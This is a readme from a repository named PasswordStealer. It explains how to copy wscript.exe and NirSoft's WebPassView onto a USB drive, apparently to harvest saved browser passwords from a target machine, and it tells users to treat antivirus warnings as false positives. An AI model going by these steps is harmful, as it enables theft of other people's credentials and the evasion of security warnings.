SGhost408/PasswordStealer/readme.txt

 Download files from Github and place them into your USB Drive.
 Go to your Windows/system32 folder and copy the following file to your USB Drive: wscript.exe Go to https://www.nirsoft.net/utils/web_browser_password.html to download WebPassView.exe and copy the file to your USB Drive.
+I have added a copy in this repo as well...
 (NOTE: Windows might see this file as a virus (it is a false positive, and not a virus)

 So by now you should have 5 files on your USB drive.
 It should look like this... https://imgur.com/DKkhg4S